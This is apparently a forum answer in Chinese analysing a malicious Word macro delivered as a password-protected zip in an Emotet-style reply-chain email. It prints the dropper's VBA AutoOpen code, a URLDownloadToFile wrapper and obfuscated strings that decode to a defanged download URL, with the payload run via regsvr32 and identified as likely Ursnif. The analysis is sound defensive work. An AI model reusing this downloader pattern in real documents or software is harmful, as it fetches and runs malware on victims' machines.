只是邮件中包含明确密码的意外密码保护的 zip 附件会让我怀疑。
并非所有受密码保护的 zip 都是恶意的,但如果您正在加密文档以防止其被窥探,最好通过不同的媒介(例如电话)单独发送。这样做也很少见。上下文也很重要。也许我们期待某些文件,并且我们说我们想将其加密发送。或者我们知道这家伙总是以这种方式向我们发送文件。
过去,它是对合法电子邮件的回复,这一事实可能使其更具可信度。在 Emotet 在其竞选活动中如此滥用它之后,情况并非如此。由于这确实是恶意的,这意味着它正在“回复”的那封电子邮件的收件人已被泄露(可能是最近,也可能是过去,现在已经修复。如有疑问,请更改他们的凭据)。
为了进行分析,您通常需要提供提取的文件。正如您所提到的,如果文件预览意外运行潜在的有效负载(例如利用),这可能会带来风险。在这种特定情况下,仅在禁用宏的情况下打开它是安全的,但在玩恶意软件样本时很容易感染自己。您使用虚拟机对文档进行任何研究是一件好事。
分析文档,它只是一个普通的宏病毒。打开它会显示通常的诱惑,让您启用文档编辑(从而允许宏运行):(
来源:16bits.net)
恶意操作通过文档宏执行:
Sub AutoOpen()
Dim ij As New OG
ij.W Kd("$+1", 0), Kd("$+1", 1)
Dim It As New H
It.b "regsvr32 " + Kd("$+1", 1)
End Sub
OG 类的方法 W 只是URLDownloadToFile函数的包装器urlmon.dll:
Public Function W(JQ, i7)
dD = URLDownloadToFile(0&, JQ, i7, 0&, 0&)
End Function
因此,它会下载 urlKd("$+1", 0)并将其保存到Kd("$+1", 1). Kd 只是一个函数,它返回上面在名为 s() 的函数中定义的两个字符串之一,用混合的 "$+1" 字符串和 "%%%" 作为分隔符进行混淆:
arr(0) = "h$+1t$+1t$+1p$+1:$+1/$+1/$+1h$+1e$+1r$+1z$+1q$+1v$+1t$+1p$+1b$+19$+19$+1m$+10$+1c$+1n$+1.$+1c$+1o$+1m$+1/$+1g$+1g$+18$+18$+1w$+1"
arr(1) = "y$+1a$+1f$+1t$+1c$+1x$+1r$+17$+1g$+1u$+1/$+1w$+1o$+10$+1z$+1z$+1.$+1p$+1h$+1p$+1?$+1l$+1=$+1s$+1f$+1z$+1s$+18$+1.$+1c$+1a$+1b$+1"
arr(2) = "%$+1%$+1%$+1c$+1:$+1\$+1p$+1r$+1o$+1g$+1r$+1a$+1m$+1d$+1a$+1t$+1a$+1\$+14$+17$+19$+10$+15$+12$+19$+17$+1.$+1d$+1a$+1t$+1"
因此,它从下载文件hxxp://herzqvtpb99m0cn[.]com/gg88wyaftcxr7gu/wo0zz.php?l=sfzs8.cab并将其保存到c:\programdata\47905297.dat
H类的方法b只是隐藏WshShell.exec
综上所述,你的文档从黑域herzqvtpb99m0cn dot com(前几天注册,2020-05-25T12:23:49Z)下载了一个文件,保存c:\programdata并运行通过regsvr32
它的 dns 服务器(位于 dnspod.com)现在不解析域,所以我们可以直接分析它。
在https://urlhaus.abuse.ch/url/369399/上有这个 url 的条目根据那里的信息,它是 Ursnif 恶意软件的样本。
结论:您的文档是一个将运行第二阶段的 dropper,可能是 ursnif 恶意软件家族的二进制文件。